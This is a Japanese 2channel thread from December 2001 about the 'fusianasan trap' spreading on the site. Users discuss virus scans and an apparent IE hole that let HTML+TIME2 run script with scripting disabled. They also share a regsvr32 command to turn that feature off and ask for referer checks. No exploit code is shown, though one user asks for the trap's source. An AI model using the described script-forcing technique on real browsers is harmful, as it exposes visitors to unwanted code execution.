>>該当掲示板は削除致しました。

自己レス。
対策が終了して問題がないようなので、「 >>843 」は保留します。

もう大丈夫なの？何もしなくても。
俺も「残念ながら・・・」だったから焦ったんだけど

>>784
トロイに感染した方、ファイル名・ウイルス名を教えてくださいー。

>>883
自分にも感染してたけど、駆除されたから知らん。

なんか無茶苦茶怖えー、、
初めてウイルスに感染か？

昨日の騒ぎの後で>>694の
http://housecall.antivirus.com/housecall/start_jp.asp
でスキャンしたらトロイの木馬が検出された。
＃名前は失念した。

念のため、今朝Norton AntiVirus 2002で
ＰＣを完全スキャンしたが無事でした。

念のためウィルススキャン掛けといた方が良いよ。

既にウィルスに感染してたんでしょ。
トロイなら自覚症状なんて無いし。

私も踏んだので、念のためやってみたけど
出なかったよ。
出た人って、どこの分を踏んだの？
私はこの板のtatuta氏のところの分。たしか14giｆだったと・・・。

キャッシュに入ったHTML+TIMEのコードがウィルスチェックに
引っかかっていると思われ

ノートンアンチウィルスでは、
スクリプト内で例えばAxtiveXObjectを呼び出すような、
少し特殊なコードを書いただけで、無関係な安全なものまで、
ウィルスだのトロイだのと判断していまうので、
ひょっとしたらそれが原因かもしれませんね。

Nortonでスキャンしたらloveletter[1].txt.vbsとかいうファイルが見つかった。
かなりﾋﾞﾋﾞｰﾀよ

スキャンしたけど、ひっかからなかった。

これを期にみなさんNetscapeCommunicatorに乗り換えましょう

>>894
乗り換えてどうするの？

折角IEにはパッチが出ているのにNetscapeはまだパッチを出してくれないんだよ？

そういえば、パッチを当てても無駄だからパッチを当てるな、と
主張していた奴もいたっけ…。そいつもNetscapeを推奨していた。

Netscapeユーザーって確信犯が多いの？

>>895
ネタか？
こんなトラップが作れてしまうようなバカブラウザはIEくらいなもんだよ。
IEは、たとえて言うなら見てくれだけの欠陥住宅みたいなものだ。

Netscapeなら100%大丈夫だとはいえないが、IEよりかは真面目に作られている。
元になっているオープンソース版にはたくさんのプログラマの目が通っているから
恥ずかしい手抜きはできないし、万一深刻な問題があれば抜本的に対策がされる。

およ？なんでIDがいっしょになるの。
内容からしてわかると思うが、895≠897、896≠897だよ。
895=896かどうかは知らん。

>897
根介でもJavaScriptをONにしていたら駄目なんじゃない？
今回のケースでは。

結局の所２ｃｈ側で何か対応はされたの？

この串かな？

あ、なるほど、、、よくみりゃそういうことか。

ネットでご融資。アイフル↓
http://px.a8.net/svt/ejp?a8mat=6OG06+G539DE+J6+BWVTE

>>899
結論
ネスケユーザーは確信犯か単なる馬鹿

このトラップのソース持ってる人いる？
ちょうだい

teniireta

転送量超過騒ぎの時になってれば面白かったのになぁ

そんなことになったら、ほんとににちゃんあぼ〜んになってたかも（ｗ

>>908
かちゅユーザー？

俺はお客様だったのか・・・

俺はNNしか使ってない。メーラーもAl-mailのみ。
おかげでウィルス知らず。ついでにAntiVirus入れてる。これ。
ついでにNNはJava関係とCookieは全てオフにしてある、これ最強。

いずれにしてもブラクラチェッカーか何かでソース見ろよー

IE5.01sp2でJavaScriptオンにしといてIEコンポ使うソフト (ﾟдﾟ)ｳﾏｰ
DonutRではJavaScript切るように設定できて (ﾟдﾟ)ｳﾏｰ
Becky2ではHTML表示全部切って (ﾟдﾟ)ｳﾏｰ

↓今回の騒ぎでproxy規制の巻き添え食らって２ｃｈに書き込めなくなった人
　　　　　　 ||
　　　　　∧||∧
　　　　（ / ⌒ヽ
　　　　　| | 　　|
　　　　　∪ / ﾉ
　　　　　 | ｜|
　　　　　 ∪∪

ウイルスの件だけどJS_PLAY.Aつう奴だった、オンラインスキャンでトロイがうんたらかんたらって出たけど、
調べたらトロイではないらしい。。つうかインストールしてあるノートンでは検出されなかったし。。
ttp://www.trendmicro.co.jp/virusinfo/default3.asp?VName=JS%5FPLAY%2EA

２ちゃんねるがはじまり３度目の年始だがな、
これだけは譲れねーんだ。
個人掲示板に毛が生えたってスタンスだな。
管理側が好きなようにできねーと面白くないだろ？俺が。
お前らが何を騒ごうとと俺は書けるからな。
名無しで批判要望板の肝の小さいユーザーを煽る状況もだな、
相変わらずだが変わっていない。
お前らはその身分を弁えなさい。
特に初心者はそのことを弁えてない様だな。
この際だから、サーバーの負荷分散も考えて、
サポートのしっかりとした掲示板でも覗いてみなさい。
他にもいっぱいあるぞ。

http://messages.yahoo.co.jp/
http://1ch.tv/
http://www.excite.co.jp/boards/
http://board.lycos.co.jp/

>915
誤麦か？日本語不自由なのか？

　

この様子じゃ次スレは煎らんな。

Netscape 6.2.1Jは重過ぎるんで使う気にならん

本家に行けば英語版Navigator4.07単体がまだDLできる
同じバージョンでも英語版のほうが軽かったりする

ネスケ６は、ブックマークが鬼のように使いづらい。
ここはもう、世間に巻かれるまま、IEに乗り換えるべきかと思ったりするけど、
なかなかね…。

http://www2.wbs.ne.jp/~go-to/check.html
チェックページ作ってみました。
Javascriptオン、もしくはオフでも「HTML+TIME2」が有効なら
警告ダイアログが出ます。

fusianasanトラップになんらかの対処を
http://pc.2ch.net/test/read.cgi/sec/1008581128/
参考リンク
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/12.html
ttp://memo.st.ryukoku.ac.jp/archive/200112.month/2392.html

ＭＳ未発見のＩＥのバグという結論になりそうです。

お絵描き掲示板にファイルのアップなんてWeb周りのプログラムの知識があれば
簡単なのに、アップされたとこ疑われて迷惑被ったんだね、やれやれ…
おれも実験に2ch系お絵描き掲示板にアスキーアートを画像化してアップしたことある
お絵描き掲示板でわざわざ余計難しいAA描いたと思われたのかな（ｗ
これでお絵描き掲示板にアップソフトなんて言うのも広まったりするのか…
おれは公開する気はない。荒らしになるからな。
あれ作ったやつならアップソフトぐらい簡単だろうね。

お絵描き掲示板のCGIは公開するから、公開してもばれないような認証を考えるのは
公開キー暗号とかそう言うのに詳しくないと、アプレット以外からアップできない
ものは難しいでしょうね。

>>923-924の日本語が理解できないのは俺だけか？

>>923-924
縦読み？

お簡おおこおあお公も

つか圧縮があったな？

yahooで掲載してるYO。
http://headlines.yahoo.co.jp/hl?a=20011221-00000005-vgb-sci

IE の新しい脅威　スクリプトがオフでも強制的に実行させることができる

〜IE に未知のセキュリティホール!?「fusianasanトラップ」より判明〜

　巨大掲示板 2ch で蔓延している「fusianasanトラップ」の中に、IE の未知のセキュリティホールが利用されている可能性があることが指摘されている。
　セキュリティホールmemo メーリングリストで TAKAGI Hiromitsu 氏から報告された内容によれば、「fusianasanトラップ」の4つの新しいポイントがある。
　そのうち、4番目のポイント「セキュリティ設定でアクティブスクリプトを無効に設定していても、強制的にスクリプトを実行させる技」が、これまでに報告
されたことのない未知のセキュリティホールである可能性がある。

　本記事は、セキュリティホールmemo およびセキュリティホールmemo を参考にしております。

[memo:2396] Re: fusianasan トラップになんらかの対処を
[TAKAGI, Hiromitsu]
http://memo.st.ryukoku.ac.jp/archive/200112.month/2396.html（Scan）

なあ、画像ファイルにブラクラ埋め込むのって禿げしく既出じゃないのか？

>>931
それ自体は禿らしくガイシュツ。
HTML+TIME でスクリプト無効を無視するのが新技

なにげに大問題だったのか。
2chでの事件はむしろ警告だったのかも。

とりあえずは>>921で対策してみた。

まとめてみました。
http://www2.sala.or.jp/~uuu/script/

>>934
なんと、このスレ>>79の人っすね？
IE5.0-5.5で未解決の方はヤバイな〜

>>934
ぢつは海外ではどこかで既出だったの？？

>>936
IE5.0-5.5の方は不明だけど、比較的簡単に気づくことができるから、
MSが自分で発見して、こっそりIE6.0で修正したんだと思う。
IE5.5-6.0の方は検索してもほとんどヒットしないし、
修正されていないので未発見です。

>>937
という事は、何処かにDEMOコード公開されてた訳ぢゃ無いんだ。。。Thx
少し安心、、、、できないな。丁度年末だし、再現性、、、
あ〜。。
一MSユーザの漏れ、MS01-020公開以来のビクーリ。

お祭り会場でフシアナトラップ発生中
http://live.2ch.net/festival/

＠ノハ＠
（　‘д‘）＜やっぱり…

↓初出（犯人）
http://live.2ch.net/test/read.cgi/festival/1008929176/109

お祭りじゃん

＠ノハ＠
（　‘д‘）＜お祭り会場の削除依頼スレありますか？

>>943
この時間じゃ削除は無理でしょう。警告スレ立てて、アクセス減るまで
放置って所じゃないでしょうか。

＃新鯖は対応スクリプト入れてなかったのかなぁ？

＠ノハ＠
（　‘д‘）＜そうですか…
　　　　　　　一応、削除スレは立ったみたいですけど

ttp://www.hellplant.org/cgi-bin/uploader/upload.cgi
アプロダカキコだ。。確信犯。証拠保全。
↓
[206.jpg]2chにすれ立てるやつ（悪用禁止）2001年12/18(火)13:48

芸無いな。まるで中身は同じ。

＠ノハ＠
（　‘д‘）＜リファラ規制はこれの対策じゃないんですか？

＠ノハ＠
（　‘д‘）＜えらいことなってます！！！

http://live.2ch.net/festival/

これも祭りだから放置？

お祭りｃｈに緊急告知スレ立てました。

＠ノハ＠
（　‘д‘）＜既に３０個ほど立ってるんですが、放置ですか？

こっちもあやしくなってきた･･･
http://live.2ch.net/endless/index.html
live鯖対策してねーなこれ｡

削除依頼スレ
http://teri.2ch.net/test/read.cgi/saku/1008938475/

つか削除するより先にbbs.cgiとsubbbs.cgiの変更を・・・

>>951
ふんじゃった消しといて
↓
http://live.2ch.net/test/read.cgi/festival/1008938852/l50

実況版にも使徒侵入
http://live.2ch.net/endless/
↓初出（犯人）
http://live.2ch.net/test/read.cgi/endless/1008937806/105

＠ノハ＠
（　‘д‘）＜ちょいスレ違いですけど、↓何ですか？

http://live.2ch.net/test/read.cgi/festival/1008865834/

4 名前：[ここ壊れてます] 投稿日：[ここ壊れてます]
[ここ壊れてます]

＠ノハ＠
（　‘д‘）＜ひろゆきさ〜ん！夜勤さ〜ん！

[ここ壊れてます] を知らないのかよ…

懲りないねぇ、祭り板が祭られてどないすんやろ？

>>959
＠ノハ＠
（　‘д‘）＜知りません！（きっぱり）

だめだ。festivalリファラチェックしてない。
http://biwa39.he.net/~ch2live/festival/

＠ノハ＠
（　‘д‘）＜早急にスクリプトの変更を

リファラチェックって負荷かからないの？

どんどん増殖してるね。トラップ作った奴ってある意味神かな

＠ノハ＠
（　‘д‘）＜祭りです…

極々一部のプロバイダは未だliveサブドメインのDNSが浸透していないから、
biwa39.he.netからのアクセスに対応するために、
Refererがこれまで規制されなかったのかもしれないわね。
いいかげんそろそろ板のトップに告知して、
biwa39.he.netからのアクセスを切り捨ててもいいと思うけど。

＠ノハ＠
（　‘д‘）＜放置…

＠ノハ＠
（　‘д‘）＜未だ増殖中です

ID:daLUBgvcさん
次スレはhttp://www2.sala.or.jp/~uuu/script/からソース転載して立てますね。

2geterにはたまらない。

ニュー速＋にひろゆきいたみたいだから、カキコしといた｡

>>972
祭り厨も呼び込むという諸刃。

まぁ他に手はないけどね。乙。

＠ノハ＠
（　‘д‘）＜ひろゆきさん…まだですか？

ｽｸﾘﾌﾟﾄﾝいじってるのかな

＠ノハ＠
（　‘д‘）＜止まった？

使徒、活動停止しました。

>>947
やっと事態を把握しました...
17, 18 日と旅行逝ってたもので...

ｸﾎﾟ…またやってたん？（わら

【危機】フシアナサントラップになんらかの対処を＜３＞

fusianasanトラップが未だlive鯖で有効だった模様。

また、今回の騒ぎでIEの未知のバグが露呈？！
http://www2.wbs.ne.jp/~go-to/check.html
スクリプトオフにして↑に行って
スクリプト（alertダイアログ）が実行されるとしたら問題。

関連リンク
http://headlines.yahoo.co.jp/hl?a=20011221-00000005-vgb-sci
http://memo.st.ryukoku.ac.jp/archive/200112.month/2396.html
https://www.netsecurity.ne.jp/article/1/3581.html
前スレhttp://teri.2ch.net/test/read.cgi/accuse/1008597418/l100

------------
・・・と思ったら解決してたり？

あ〜、でも一応立てとこうかね。

よくあることだし…おつかれさま。

２に全文コピペしておいたほうがいいんじゃない？

Javaスクリプトをオフにしているにもかかわらず
スクリプトが実行されるのは、
IE5.5以降標準で装備されている
「HTML+TIME2」の機能によるものらしい。

「HTML+TIME2」の機能をオフにするには

「ファイル名を指定して実行」で
regsvr32 /u mstime.dll
を実行する。

元に戻すには
regsvr32 mstime.dll
を実行する。

>>983
おけーです。
IEのバグ関係を>>2-10って感じで。

【危機】fusianasanトラップになんらかの対処を＜３＞
http://teri.2ch.net/test/read.cgi/accuse/1008944701/

上記の
regsvr32 /u mstime.dll
をしたあとは、InternetExplorerのウインドウを全部閉じて、
インターネットエクスプローラーを再起動してからでないと効果がないのではないのかな？

タツタの部屋…
漏れ１年前ほど前常連だったな…
アンチ２ちゃん多かった。その割には２ちゃん語も飛び交ってたが

ラーララーララララーラーララ

アーーーーーーーーアーアアアーアーアアア

ハッベイビハッベイビハッベイビハッテンディン

もうだめぽ

おながいします　　　　　　

オナニーガイストします

チンポゴキブリ　　　　　

995

(・∀・)ｲﾝｺﾞｰ!

もうすこし

Masasi Tasiro

ahya

1000

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。